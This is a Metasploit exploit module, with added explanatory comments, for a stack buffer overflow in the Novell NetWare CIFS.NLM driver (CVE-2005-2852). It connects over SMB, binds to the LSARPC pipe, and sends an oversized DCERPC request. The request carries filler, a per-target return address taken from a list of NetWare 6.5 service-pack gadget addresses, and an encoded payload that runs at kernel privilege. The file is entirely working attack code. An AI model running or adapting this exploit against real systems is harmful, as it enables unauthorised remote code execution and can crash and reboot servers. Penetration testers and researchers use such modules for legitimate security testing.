##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the NetWare CIFS.NLM stack buffer overflow referenced as
# CVE-2005-2852 / OSVDB 12790 below. The request is delivered over SMB to the
# LSARPC named pipe (SMBPIPE option). Because the driver runs in kernel space,
# a failed attempt can reboot the target ('Notes'/'Stability').
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  # Registers module metadata and the SMBPIPE option, and removes the
  # DCERPC::fake_bind_multi option from the datastore (it is forced off in
  # #exploit because NetWare does not support multi-bind).
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.
          Since the driver runs in the kernel space, a failed exploit attempt can
          cause the OS to reboot.
        },
        'Author' => [
          'toto',
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-2852' ],
          [ 'OSVDB', '12790' ]
        ],
        # Kernel-mode driver: code runs with full system privilege.
        'Privileged' => true,
        # Payload limits: at most 400 bytes and no NUL byte (the encoded
        # payload is appended to the overflow buffer in #exploit).
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00"
        },
        'Platform' => 'netware',
        # 'Ret' is the dword written after the 0xa0-byte filler in #exploit;
        # it is the only per-target value.
        'Targets' => [
          # NetWare SP can be found in the SNMP version :
          # 5.70.07 -> NetWare 6.5 (5.70) SP7 (07)

          [ 'VMware', { 'Ret' => 0x000f142b } ],
          [ 'NetWare 6.5 SP2', { 'Ret' => 0xb2329b98 } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP3', { 'Ret' => 0xb234a268 } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP4', { 'Ret' => 0xbabc286c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP5', { 'Ret' => 0xbabc9c3c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP6', { 'Ret' => 0x823c835c } ], # push esp - ret (libc.nlm)
          [ 'NetWare 6.5 SP7', { 'Ret' => 0x823c83fc } ], # push esp - ret (libc.nlm)
        ],
        # Operator-facing risk hints (per the constant names): a failed run
        # restarts the OS, the activity is expected to appear in target
        # logs, and a resulting session may be unreliable.
        'Notes' => {
          'Stability' => [ CRASH_OS_RESTARTS ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ UNRELIABLE_SESSION ]
        },
        'DisclosureDate' => '2007-01-21'
      )
    )

    register_options(
      [
        OptString.new('SMBPIPE', [true, 'The pipe name to use (LSARPC)', 'lsarpc'])
      ]
    )

    deregister_options('DCERPC::fake_bind_multi')
  end

  # Runs the module: SMB connect and login, DCERPC bind over the SMBPIPE
  # named pipe, one call to opnum 0x2c whose first 20 response bytes are
  # reused as a handle, then the oversized call to opnum 0x0E, followed by
  # the payload handler and disconnect.
  #
  # Side effects: network traffic to RHOST; the target may reboot if the
  # attempt fails. Errors from the final DCERPC call are swallowed on purpose.
  def exploit
    # Force multi-bind off (netware doesn't support it)
    datastore['DCERPC::fake_bind_multi'] = false

    connect
    smb_login

    # Interface UUID/version for the bind; the pipe name is the SMBPIPE
    # option (default 'lsarpc', registered in #initialize).
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # First request stub: a random dword, the UNC server name (\\RHOST) as a
    # conformant/varying Unicode string, six zero dwords and a trailing
    # 0x000f0fff dword.
    stb =
      NDR.long(rand(0xffffffff)) +
      NDR.UnicodeConformantVaryingString("\\\\#{datastore['RHOST']}") +
      NDR.long(0) +
      NDR.long(0) +
      NDR.long(0) +
      NDR.long(0) +
      NDR.long(0) +
      NDR.long(0) +
      NDR.long(0x000f0fff)

    resp = dcerpc.call(0x2c, stb)
    # Trailing comma makes this a one-element multiple assignment; resp[0, 20]
    # is a String (no to_ary), so handle receives the 20-byte slice unchanged.
    handle, = resp[0, 20]
    # The dword after the handle is decoded but never checked (hence the
    # leading underscore); a failed first call is not detected here.
    _code = resp[20, 4].unpack('V')

    # Overflow buffer: 0xa0 bytes of alphanumeric filler, the per-target
    # return address as a little-endian dword, then the encoded payload.
    name =
      rand_text_alphanumeric(0xa0) +
      [target.ret].pack('V') +
      payload.encoded

    # Second request stub: the handle from the first call, two dwords of 1,
    # name.length twice as 16-bit fields, a random dword, the prebuilt
    # Unicode name, then the dwords 0, 0, 1, 0.
    stb =
      handle +
      NDR.long(1) +
      NDR.long(1) +
      NDR.short(name.length) +
      NDR.short(name.length) +
      NDR.long(rand(0xffffffff)) +
      NDR.UnicodeConformantVaryingStringPreBuilt(name) +
      NDR.long(0) +
      NDR.long(0) +
      NDR.long(1) +
      NDR.long(0)

    print_status('Calling the vulnerable function ...')

    # Only StandardError is rescued; the handler and disconnect below still
    # run when the call raises.
    begin
      dcerpc.call(0x0E, stb)
    rescue StandardError
      # DCERPC call may fail, this is expected
    end

    handler
    disconnect
  end
end